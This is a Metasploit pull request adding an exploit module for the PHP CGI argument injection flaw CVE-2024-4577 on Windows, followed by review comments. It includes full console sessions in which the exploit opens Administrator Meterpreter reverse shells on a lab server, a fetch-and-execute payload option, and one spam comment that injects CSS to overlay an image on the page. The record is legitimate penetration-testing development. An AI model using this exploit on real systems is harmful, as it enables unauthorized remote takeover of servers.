### PR TITLE
Add exploit module for the new PHP CGI Argument Injection vuln (CVE-2024-4577)

### PR DESCRIPTION
**Pull request by sfewer-r7**
The (draft) pull request adds an exploit module for the new PHP CGI argument injection vulnerability disclosed yesterday. H/t to Orange Tsai who found the vuln (see [the Devcore disclosure](https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/)), and watchTowr for their [analysis](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/).

## To-Do
* More testing on different configurations (I have only tested XAMPP in a Japanese locale)
* Documentation

## Testing

I configured a Windows Server 2022 system with the Japanese locale (Code page 932). As  [XAMPP](https://www.apachefriends.org/download.html) is known to be vulnerable in a default configuration, I installed XAMPP  `8.2.12 / PHP 8.2.12` ([direct download link here](https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe)).

The exploit supports both PHP payloads (`ARCH_PHP`) and command payloads (`ARCH_CMD`). Note, for testing the `ARCH_CMD` payloads you may need to disable Defender if you are dropping a stock Meterpreter.

## Example: Windows PHP Payload

```
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options

Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80                    yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
   VHOST                            no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows PHP



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
[*] Sending stage (39927 bytes) to 192.168.86.50
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:49991) at 2024-06-07 15:31:53 +0100

meterpreter > getuid
Server username: Administrator
meterpreter > pwd
C:\xampp\php
meterpreter > sysinfo
Computer    : WIN-V28QNSO2H05
OS          : Windows NT WIN-V28QNSO2H05 10.0 build 20348 (Windows Server 2022) AMD64
Meterpreter : php/windows
meterpreter > 
```

## Example: Windows Command Payload

```
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options

Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80                    yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
   VHOST                            no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      EmrOsqzs         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
[*] Sending stage (201798 bytes) to 192.168.86.50
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:49994) at 2024-06-07 15:33:10 +0100

meterpreter > getuid
Server username: WIN-V28QNSO2H05\Administrator
meterpreter > pwd
C:\xampp\php
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : ja_JP
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 
```

### CODE REVIEW

**Comment by bcoles** [comment]
I haven't had a chance to play around with this bug in a test environment yet. I'm curious if we can use `-s` (`%ADs`) as a simply less-invasive `check`, like the similar 2012 bug?

https://github.com/rapid7/metasploit-framework/blob/9981a24a6c32d318cfed71074e562527b2a100b3/modules/exploits/multi/http/php_cgi_arg_injection.rb#L84

**Comment by sfewer-r7** [comment]
> I haven't had a chance to play around with this bug in a test environment yet. I'm curious if we can use `-s` (`%ADs`) as a simply less-invasive `check`, like the similar 2012 bug?

Good idea, I did a quick check against a vulnerable XAMPP server in a Japanese locale, and a non vulnerable XAMPP server in an English locale. Unfortunately, both responses when I just used `-s` (`%ADs`) was the same `500 Internal Server Error` and I could not distinguish the vulnerable server from the non vulnerable server (The body/headers of both responses was the same).

**Comment by simulified** [comment]
sup
```math
\ce{$\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://github.com/Roblox/t/assets/106361566/b3306f20-57e8-449d-95f7-0ec0597b4e7e');]{x0000}$}
```

**Comment by Chocapikk** [comment]
https://github.com/xcanwin/CVE-2024-4577-PHP-RCE

File: modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb [hunk 1]
```diff
@@ -0,0 +1,159 @@
...
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PHP CGI Argument Injection Remote Code Execution',
+        'Description' => %q{
+          This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations
+          on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that
+          the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)
+          character. Additionally a target web server bust be configured to run PHP under CGI mode, or directly expose
```
Comment (jheysel-r7) [inline modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb:21]:
```suggestion
          character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose
```

**Comment by jheysel-r7** [comment]
# Release Notes

Windows systems running Japanese or Chinese (simplified or traditional) locales are vulnerable to a PHP CGI argument injection vulnerability. This exploit module returns a session running in the context of the Administrator user.

**Pull request merged**